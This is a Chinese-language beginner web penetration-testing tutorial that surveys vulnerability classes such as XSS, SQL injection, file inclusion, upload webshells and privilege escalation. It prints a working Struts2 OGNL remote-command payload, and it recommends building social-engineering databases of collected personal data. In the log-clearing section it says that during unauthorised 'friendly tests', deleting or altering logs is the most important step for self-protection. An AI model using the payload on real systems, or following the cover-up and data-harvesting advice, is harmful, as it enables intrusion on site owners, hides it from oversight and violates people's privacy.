Web安全 -- 入門
時(shí)間:2023-06-05 00:18:02 | 來源:網(wǎng)站運(yùn)營(yíng)
時(shí)間:2023-06-05 00:18:02 來源:網(wǎng)站運(yùn)營(yíng)
Web安全 -- 入門:
雙十一來了,團(tuán)隊(duì)也在想著為大家搞點(diǎn)福利。所以特約好朋友給大家開幾期滲透測(cè)試課程。此次課程基本上就是利用自己搭建靶場(chǎng)和編寫靶場(chǎng),給大家進(jìn)行講解。大佬已經(jīng)有著非常豐富的滲透測(cè)試經(jīng)驗(yàn),必定會(huì)把套路傳給大家。 明天啟程系列課程也會(huì)進(jìn)行更新,視頻文章同時(shí)出,由于上節(jié)課程聽朋友們普遍反映聲音比較低,就沒有進(jìn)行外放,這次老師會(huì)把上一節(jié)課程全部補(bǔ)上,然后進(jìn)行共享。
福利:2篇技術(shù)文章+2個(gè)視頻,全部免費(fèi)啦
社工技術(shù)
社會(huì)工程學(xué)(Social Engineering,又被翻譯為:社交工程學(xué))在上世紀(jì)60年代左右作為正式的學(xué)科出現(xiàn),廣義社會(huì)工程學(xué)的定義是:建立理論并通過利用自然的、社會(huì)的和制度上的途徑來逐步地解決各種復(fù)雜的社會(huì)問題,經(jīng)過多年的應(yīng)用發(fā)展,社會(huì)工程學(xué)逐漸產(chǎn)生出了分支學(xué)科,如公安社會(huì)工程學(xué)(簡(jiǎn)稱公安社工學(xué))和網(wǎng)絡(luò)社會(huì)工程學(xué)。 簡(jiǎn)單來說社會(huì)工程學(xué)就是對(duì)目標(biāo)的信息搜集,當(dāng)然不僅僅是搜集目標(biāo)主動(dòng)泄漏的信息,還要利用各種方式去獲取目標(biāo)的相關(guān)系統(tǒng)。 在滲透測(cè)試的過程中,社工技術(shù)會(huì)對(duì)整個(gè)滲透測(cè)試的方案和最終結(jié)果產(chǎn)生巨大的影響。 主要獲取的信息(滲透測(cè)試中)包括:服務(wù)器信息,網(wǎng)站所有者信息,域名信息等。
例:對(duì)紅日實(shí)驗(yàn)室的簡(jiǎn)單社工
現(xiàn)在的網(wǎng)絡(luò)環(huán)境對(duì)安全越來越重視,無疑加大了信息搜集的難度,在以后的學(xué)習(xí)道路上我們要收集搭建屬于自己的社工庫(kù),比如說
在日后的課程中,我也會(huì)帶著大家搭建這樣的社工庫(kù)并提供部分?jǐn)?shù)據(jù)
這樣的一個(gè)社工庫(kù),里面加入我們收集到的數(shù)據(jù),并逐漸擴(kuò)大我們的數(shù)據(jù)庫(kù)內(nèi)容,這樣在以后的工作中會(huì)對(duì)你提供很大的幫助。
漏洞挖掘
經(jīng)過信息的獲取,我們可以定位到我們的目標(biāo)信息,同時(shí),可以把我滲透方法的范圍縮小,可以開展針對(duì)性的測(cè)試了。
服務(wù)器方面
針對(duì)不同的服務(wù)器,我們會(huì)進(jìn)行不同的測(cè)試,比如目標(biāo)是一個(gè)linux的系統(tǒng),我們基本就不會(huì)去看asp方面的漏洞了,只會(huì)對(duì)它有可能存在的漏洞進(jìn)行測(cè)試,而服務(wù)器方面,我們也會(huì)發(fā)現(xiàn)不同的版本漏洞。在他的中間件等等。
- 實(shí)驗(yàn)方法:不同版本的服務(wù)器或其他終端+相對(duì)應(yīng)溢出工具
溢出漏洞
- 漏洞原理:緩沖區(qū)溢出是一種非常普遍、非常危險(xiǎn)的漏洞,在各種操作系統(tǒng)、應(yīng)用軟件中廣泛存在。利用緩沖區(qū)溢出攻擊,可以導(dǎo)致程序運(yùn)行失敗、系統(tǒng)宕機(jī)、重新啟動(dòng)等后果。更為嚴(yán)重的是,可以利用它執(zhí)行非授權(quán)指令,甚至可以取得系統(tǒng)特權(quán),進(jìn)而進(jìn)行各種非法操作。 主要的原理是:通過在程序的地址空間里安排適當(dāng)?shù)拇a?;蜻m當(dāng)?shù)某跏蓟拇嫫骱蛢?nèi)存,讓程序跳轉(zhuǎn)到入侵者安排的地址空間執(zhí)行??梢愿鶕?jù)這兩個(gè)目標(biāo)來對(duì)緩沖區(qū)溢出攻擊進(jìn)行分類。
- 漏洞靶場(chǎng):虛擬搭建的各類型服務(wù)器+提權(quán)工具
- 漏洞實(shí)戰(zhàn)演練:在真實(shí)環(huán)境下獲取webshell后實(shí)戰(zhàn)操作
- 個(gè)人總結(jié):溢出漏洞可以直接獲取服務(wù)器的最高權(quán)限,危害巨大,但利用環(huán)境要求較高,不易利用成功。
應(yīng)用方面
應(yīng)用方面我們要講的就會(huì)多一些了,雖然網(wǎng)站類型多變,各種語言層出不窮,但主要的漏洞就是那么幾個(gè)。可以參考
owasp top 10
,我優(yōu)先為大家介紹一下危害比較大的漏洞類型。
跨站腳本漏洞
- 漏洞原理:
- (1)持久型跨站:最直接的危害類型,跨站代碼存儲(chǔ)在服務(wù)器(數(shù)據(jù)庫(kù))。
- (2)非持久型跨站:反射型跨站腳本漏洞,最普遍的類型。用戶訪問服務(wù)器-跨站鏈接-返回跨站代碼。
- (3)DOM跨站(DOM XSS):DOM(document object model文檔對(duì)象模型),客戶端腳本處理邏輯導(dǎo)致的安全問題。
當(dāng)我們?cè)L問這個(gè)頁(yè)面時(shí),我們的PC就在攻擊者的beef中上線了
通過 beef,我們可以對(duì)上線的瀏覽器進(jìn)行很多的后門操作比如最基本的彈窗:
- 漏洞實(shí)戰(zhàn)演練:
http://www.alliedjeep.com/87508.htmcouponPHP CMS 1.0
跨站腳本漏洞 couponPHP
是優(yōu)惠劵和交易網(wǎng)站的內(nèi)容管理系統(tǒng)。 couponPHP CMS 1.0
版本沒有正確過濾 /admin/ajax/comments_paginate.php
或 /admin/ajax/stores_paginate.php
的 "sEcho" GET 參數(shù)值,在實(shí)現(xiàn)上存在多個(gè)跨站腳本漏洞,可導(dǎo)致在用戶瀏覽器會(huì)話中執(zhí)行任意HTML和腳本代碼。 - 個(gè)人總結(jié):以存儲(chǔ)型跨站為例,我們?cè)谟脩舻捻?yè)面輸入的語句會(huì)存入到系統(tǒng)的數(shù)據(jù)庫(kù)中,這樣,當(dāng)其他用戶訪問我們存入的信息時(shí)就造成了存儲(chǔ)型跨站的攻擊,圖片為我定入的存儲(chǔ)型跨站的利用是js。
Sql注入漏洞
- 漏洞原理:SQL注入攻擊是黑客對(duì)數(shù)據(jù)庫(kù)進(jìn)行攻擊的常用手段之一。隨著B/S模式應(yīng)用開發(fā)的發(fā)展,使用這種模式編寫應(yīng)用程序的程序員也越來越多。但是由于程序員的水平及經(jīng)驗(yàn)也參差不齊,相當(dāng)大一部分程序員在編寫代碼的時(shí)候,沒有對(duì)用戶輸入數(shù)據(jù)的合法性進(jìn)行判斷,使應(yīng)用程序存在安全隱患。用戶可以提交一段數(shù)據(jù)庫(kù)查詢代碼,根據(jù)程序返回的結(jié)果,獲得某些他想得知的數(shù)據(jù),這就是所謂的SQL Injection,即SQL注入。
- 漏洞靶場(chǎng):在我們的靶場(chǎng)中我們會(huì)了解查詢到底是怎么一回事,數(shù)據(jù)是怎么樣傳入的
上面兩個(gè)圖片,是數(shù)據(jù)以
get
及
post
方式發(fā)送的代碼內(nèi)容,我們的參數(shù)就是以這種形式發(fā)送的。而后臺(tái)接收后的樣子類似是這樣的
Select * from (xxx數(shù)據(jù)表) where what=(‘id’)
id
為你輸入的參數(shù),而
sql
注入就是在這個(gè)語句后面加入攻擊者自己構(gòu)造的語句,使數(shù)據(jù)庫(kù)查詢出我們想要的數(shù)據(jù)并給前臺(tái)一定的提示。 并會(huì)在我們的靶場(chǎng)中進(jìn)行攻擊學(xué)習(xí).
漏洞實(shí)戰(zhàn)演練:
http://www.cnblogs.com/moqiang02/p/4061399.html
- 個(gè)人總結(jié):sql注入仍然是被利用最多的漏洞,他的危害程度和利用范圍也是其他漏洞不可以比的,而且逐漸開始工具化,手工注入越來越少,雖然難度大的注入漏洞幾乎只能用手工去做,但一點(diǎn)也不影響工具的推廣和利用,比較常用的攻擊工具sqlmap,可以實(shí)現(xiàn)大量的繞過和注入方法。當(dāng)然,因?yàn)樗墓δ茉絹碓綇?qiáng)大,使用的方法也越來越復(fù)雜,有的注入點(diǎn),有可能同樣是用sqlmap,小白就注入不進(jìn)去,可是有的老手就可以通過對(duì)語句和參數(shù)的修改注入成功。 當(dāng)然有很多的注入點(diǎn)也需要自己手工去寫一些腳本去進(jìn)行測(cè)試,因?yàn)槊ぷ⑦@一形式的存在,給手工注入帶來了巨大的麻煩,圖片為我自己編寫的盲注的小腳本,可以利用注入去暴力猜出用戶的密碼。
- POC框架
- 基于原生POC編寫練習(xí)
- 基于框架POC編寫練習(xí)
越權(quán)漏洞
- 漏洞原理:是指超越權(quán)限或權(quán)力范圍的意思。越權(quán)漏洞是Web應(yīng)用程序中一種常見的安全漏洞。它的威脅在于一個(gè)賬戶即可控制全站用戶數(shù)據(jù)。當(dāng)然這些數(shù)據(jù)僅限于存在漏洞功能對(duì)應(yīng)的數(shù)據(jù)。越權(quán)漏洞的成因主要是因?yàn)殚_發(fā)人員在對(duì)數(shù)據(jù)進(jìn)行增、刪、改、查詢時(shí)對(duì)客戶端請(qǐng)求的數(shù)據(jù)過分相信而遺漏了權(quán)限的判定。所以測(cè)試越權(quán)就是和開發(fā)人員拼細(xì)心的過程。
- 漏洞靶場(chǎng):針對(duì)網(wǎng)站的權(quán)限繞過,后期會(huì)帶大家搭建相對(duì)環(huán)境學(xué)習(xí)
- 漏洞實(shí)戰(zhàn)演練:
https://loudong.sjtu.edu.cn/show/CNVD-2017-04015
齊博CMS
整站系統(tǒng)V7.0
存在越權(quán)訪問漏洞 個(gè)人總結(jié):對(duì)于越權(quán)漏洞的主要挖掘方法:
- 測(cè)試越權(quán)一般得有倆號(hào)。
- 對(duì)userid。orderid等等ID要敏感,一旦發(fā)現(xiàn),就多測(cè)測(cè)。
- 某些廠商喜歡用純數(shù)字的MD5作為用戶的cookie,多注意發(fā)現(xiàn)。
- 多使用抓包工具,多分析數(shù)據(jù)包,多修改數(shù)據(jù)包。
- 多站在開發(fā)的角度去分析網(wǎng)站哪兒存在越權(quán)。
- 多看看別人的漏洞 越權(quán)漏洞屬于邏輯漏洞,這樣的漏洞,不是代碼的硬性錯(cuò)誤,網(wǎng)站可以說他沒有sql注入漏洞,但他不可以說他沒有邏輯漏洞,只是每個(gè)人的思考方向不同,測(cè)試方法和角度也不一樣,發(fā)現(xiàn)的邏輯漏洞也就不會(huì)相同。
目錄漏洞
- 漏洞原理:該漏洞旨在訪問儲(chǔ)存在Web根文件外的文件或者目錄。主要分為以下兩種 目錄列表漏洞:用戶訪問網(wǎng)站目錄地址時(shí),能看到目錄下所有文件列表,導(dǎo)致網(wǎng)站目錄結(jié)構(gòu)暴露,重要的敏感數(shù)據(jù)泄露。目錄遍歷漏洞:程序沒有充分過濾用戶輸入的../之類的目錄跳轉(zhuǎn)符,導(dǎo)致用戶可以通過提交目錄跳轉(zhuǎn)來遍歷服務(wù)器上的任意文件。使用多個(gè)..符號(hào),不斷向上跳轉(zhuǎn),最終停留在根/,通過絕對(duì)路徑去讀取任意文件。
- 漏洞靶場(chǎng):簡(jiǎn)單的網(wǎng)站框架就可以實(shí)現(xiàn)相應(yīng)漏洞,在我們的靶場(chǎng)中會(huì)集成本漏洞
- 漏洞實(shí)戰(zhàn)演練:
http://sec.sangfor.com.cn/vulns/236.html
Pligg CMS 2.0.2
目錄遍歷漏洞
- 個(gè)人總結(jié):其實(shí)在目錄漏洞需要配合其他的漏洞進(jìn)行組合攻擊,單獨(dú)目錄漏洞的危害性并不大,但他的可利用程度確很高,當(dāng)存在其他的漏洞時(shí),這個(gè)漏洞就可以幫助我們獲取到更多的權(quán)限。
文件包含漏洞
- 漏洞原理:程序開發(fā)人員通常會(huì)把要重復(fù)使用的函數(shù)寫到單個(gè)文件中,在使用某個(gè)函數(shù)時(shí)直接在文件里面調(diào)用此函數(shù)無需再次編寫。
- 文件包含有兩種: 本地文件包含配合本地的文件遍歷漏洞,可以執(zhí)行任意文件代碼
- 遠(yuǎn)程文件包含 :即加載遠(yuǎn)程文件,在php.ini中開啟allow_url_include、allow_url_fopen選項(xiàng)。開啟后可以直接執(zhí)行任意代碼。配合本地的文件遍歷漏洞,可以執(zhí)行任意文件代碼
- 漏洞靶場(chǎng):靶場(chǎng)為jsp語言,會(huì)帶領(lǐng)大家搭建相對(duì)應(yīng)的文件包含環(huán)境,但不存在靶場(chǎng)中
- 漏洞實(shí)戰(zhàn)演練:
http://www.xuebuyuan.com/1062689.html
Phpcms 2007
遠(yuǎn)程文件包含漏洞 - 個(gè)人總結(jié):執(zhí)行任意代碼,包含惡意文件控制網(wǎng)站甚至控制服務(wù)器,這個(gè)漏洞的危害是巨大的,但他主要存在于PHP的環(huán)境中。對(duì)環(huán)境的依賴程度也相對(duì)要高,確相對(duì)好整改,只要限制好目錄的權(quán)限,這個(gè)漏洞可以造成的影響并不大。
命令執(zhí)行漏洞
- 漏洞原理:用戶通過瀏覽器提交執(zhí)行命令,由于服務(wù)器端沒有針對(duì)執(zhí)行函數(shù)做過濾,導(dǎo)致在沒有指定絕對(duì)路徑的情況下就執(zhí)行命令,可能會(huì)允許攻擊者通過改變 $PATH 或程序執(zhí)行環(huán)境的其他方面來執(zhí)行一個(gè)惡意構(gòu)造的代碼。
- 漏洞靶場(chǎng):
- 漏洞實(shí)戰(zhàn)演練:網(wǎng)上隨處可見的
struts2
網(wǎng)站,只要是沒有升級(jí)或打上補(bǔ)丁的,都會(huì)存在問題 - 個(gè)人總結(jié):最常見的命令執(zhí)行漏洞就是
struts2
漏洞了,當(dāng)然,還有weblogic
等等,今天主要給大家分享struts2
的相關(guān)知識(shí) Struts2
是一個(gè)基于MVC
設(shè)計(jì)模式的Web
應(yīng)用框架,它本質(zhì)上相當(dāng)于一個(gè)servlet,在MVC設(shè)計(jì)模式中,Struts2
作為控制器(Controller)
來建立模型與視圖的數(shù)據(jù)交互。Struts 2
是Struts
的下一代產(chǎn)品,是在 struts 1
和WebWork
的技術(shù)基礎(chǔ)上進(jìn)行了合并的全新的Struts 2
框架。其全新的Struts 2
的體系結(jié)構(gòu)與Struts 1
的體系結(jié)構(gòu)差別巨大。Struts 2
以WebWork
為核心,采用攔截器的機(jī)制來處理用戶的請(qǐng)求,這樣的設(shè)計(jì)也使得業(yè)務(wù)邏輯控制器能夠與ServletAPI
完全脫離開,所以Struts 2
可以理解為WebWork
的更新產(chǎn)品。雖然從Struts 1
到Struts 2
有著太大的變化,但是相對(duì)于WebWork,Struts 2
的變化很小。 對(duì)應(yīng)POC: ["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
簡(jiǎn)單的利用方法
弱口令漏洞
- 漏洞原理:就是說由常用數(shù)字、字母、字符等組合成的,容易被別人通過簡(jiǎn)單及平常的思維方式就能猜到的密碼,利用弱口令結(jié)合計(jì)算機(jī)系統(tǒng)等漏洞可以做到入侵的事半功倍的效果 主要的探測(cè)方法為測(cè)試驗(yàn)證碼的功能,如果目標(biāo)站的驗(yàn)證機(jī)制不完善,或存在邏輯漏洞,則可以利用該漏洞進(jìn)行暴力破解攻擊,結(jié)合社工的結(jié)果進(jìn)行測(cè)試,如果用戶存在弱口令漏洞,就會(huì)被攻擊方加以利用,偽裝成普通用戶的權(quán)限進(jìn)行登錄,擴(kuò)大攻擊者的權(quán)限范疇,增加網(wǎng)站的風(fēng)限程度
- 漏洞靶場(chǎng):靶場(chǎng)的登錄處就是這個(gè)漏洞 漏洞實(shí)戰(zhàn)演練:本漏洞主要成因是人為的,需要手工去尋找。
- 個(gè)人總結(jié):只要做好社工,基本上網(wǎng)站全是弱口令,這是某個(gè)大神說的。我覺的非常的有道理。希望大家各級(jí)去嘗試。
文件上傳漏洞
- 漏洞原理:在于代碼作者沒有對(duì)訪客提交的數(shù)據(jù)進(jìn)行檢驗(yàn)或者過濾不嚴(yán),可以直接提交修改過的數(shù)據(jù)繞過擴(kuò)展名的檢驗(yàn)。
- 漏洞靶場(chǎng):
- 漏洞實(shí)戰(zhàn)演練:
https://www.lvtao.net/shell/phpcms-upload-webshell.html
phpcms
前臺(tái)頭像上傳漏洞導(dǎo)致webshell
詳解及案例 - 個(gè)人總結(jié):這個(gè)漏洞被黑客們利用的最為猖獗,利用上傳漏洞可以直接得到WEBSHELL,危害等級(jí)超級(jí)高,現(xiàn)在的入侵中上傳漏洞也是常見的漏洞。 主要是上傳木馬文件及反彈工具等,在網(wǎng)絡(luò)上現(xiàn)在也存在這各種防護(hù)方法,具體的繞過我們就不講了,主要分享一下,上傳的東西,與方法。 上傳
webshell
,按語言主要分為三種php,asp,jsp
其他衍生的類型不計(jì)其數(shù),但核心仍是這三種,主要目的就是通過webshell
,對(duì)網(wǎng)站進(jìn)行控制。
漏洞利用
- 目的:我們整個(gè)攻擊行為的目的,比如獲取flag,目標(biāo)服務(wù)器權(quán)限等等,根據(jù)我們不同的目的,我們要做出不同的針對(duì)性的攻擊,可以大大節(jié)省我的時(shí)間和資源。 隱藏:在攻擊的過程中,我們要學(xué)會(huì)隱藏自己,把我們的攻擊行為隱藏起來,這樣我們就可以保證我們?cè)诠舻倪^程中不會(huì)被發(fā)現(xiàn),導(dǎo)致我們的攻擊過程被強(qiáng)行中斷,減少不必要的工作量。
- 特定場(chǎng)景的針對(duì)測(cè)試:每一個(gè)目標(biāo)的環(huán)境就行人一樣,都是維一的,沒有一模一樣的環(huán)境,所以我們要針對(duì)不同的環(huán)境去做不同的攻擊,減少?zèng)]必要的行為。
權(quán)限提升
當(dāng)我們拿到webshell后,我們要做的就是權(quán)限提升了,我們真正開接觸到我們的目標(biāo)了現(xiàn)在。
- 內(nèi)部信息收集:
- 根據(jù)我們的目標(biāo),我們要開始收拾信息,網(wǎng)站的基本信息,管理者的行為信息,目標(biāo)的內(nèi)部環(huán)境等,我們有了一個(gè)跳板就要把我們可以拿到的點(diǎn)都拿到手中,這樣才可以保證我們的目的達(dá)成。
- 系統(tǒng)漏洞利用:
- 我們的主要方法是溢出漏洞,當(dāng)然也存在其他的提權(quán)方法,但在這節(jié)課中不涉及那些高級(jí)的應(yīng)用了。在溢出漏洞中,我們首先要通過我們收集到的信息來確定我們可以利用的漏洞有可能有那些,如果運(yùn)氣好,我們的漏洞有可以利用的那直接利用已有的角本,我們可以直接拿到服務(wù)器的權(quán)限了,如果不能,那就要去一點(diǎn)點(diǎn)的測(cè)試,看看這個(gè)系統(tǒng)上安裝了什么軟件,然后去尋找一個(gè)可以讓我們利用的溢出點(diǎn),能過編寫這個(gè)腳本來進(jìn)行提權(quán)。比較常見的提權(quán)腳本有:
當(dāng)然,還有很多很多,我就不一一展示了,還有一部分要涉及到密碼的尋找,如果,我們沒有辦法溢出,那我們就要想辦法找到高級(jí)管理員的密碼,來登錄到高權(quán)限的帳戶上去
后門
網(wǎng)頁(yè)后門
網(wǎng)頁(yè)后門其實(shí)就是一段網(wǎng)頁(yè)代碼,主要以ASP和PHP代碼為主。由于這些代碼都運(yùn)行在服務(wù)器端,攻擊者通過這段精心設(shè)計(jì)的代碼,在服務(wù)器端進(jìn)行某些危險(xiǎn)的操作,獲得某些敏感的技術(shù)信息或者通過滲透,提權(quán)獲得服務(wù)器的控制權(quán)。并且這也是攻擊者控制服務(wù)器的一條通道,比一般的入侵更具有隱蔽性。
網(wǎng)頁(yè)掛馬
網(wǎng)頁(yè)掛馬就是攻擊者通過在正常的頁(yè)面中(通常是網(wǎng)站的主頁(yè))插入一段代碼。瀏覽者在打開該頁(yè)面的時(shí)候,這段代碼被執(zhí)行,然后下載并運(yùn)行某木馬的服務(wù)器端程序,進(jìn)而控制瀏覽者的主機(jī)。 這是主要的兩種后門情況,一個(gè)好的后門要保證自身不被發(fā)現(xiàn),不被安全軟件識(shí)別并殺死,可以進(jìn)行實(shí)時(shí)的更新。
日志清掃
完成一次完整形的滲透測(cè)試,最后一步,是對(duì)日志的處理,當(dāng)我們有客戶授權(quán)的情況下,這一步并不重要,但當(dāng)你是自己做一些友情測(cè)試?yán)铮@一步就是最重要的一步,你要通過對(duì)日志的處理來更好的保護(hù)自己,刪除敏感日志,或修改日志內(nèi)容,并備份真實(shí)日志。
經(jīng)驗(yàn)總結(jié)
整個(gè)測(cè)試結(jié)束,我們要對(duì)我們的思路和過程做一個(gè)完整的總結(jié),保證下次我們遇到類似的環(huán)境時(shí),可以直接利用我們已經(jīng)有的東西,并在自身的團(tuán)隊(duì)中交流經(jīng)驗(yàn),總結(jié)這次工作中的不足,這是進(jìn)步最好的方法。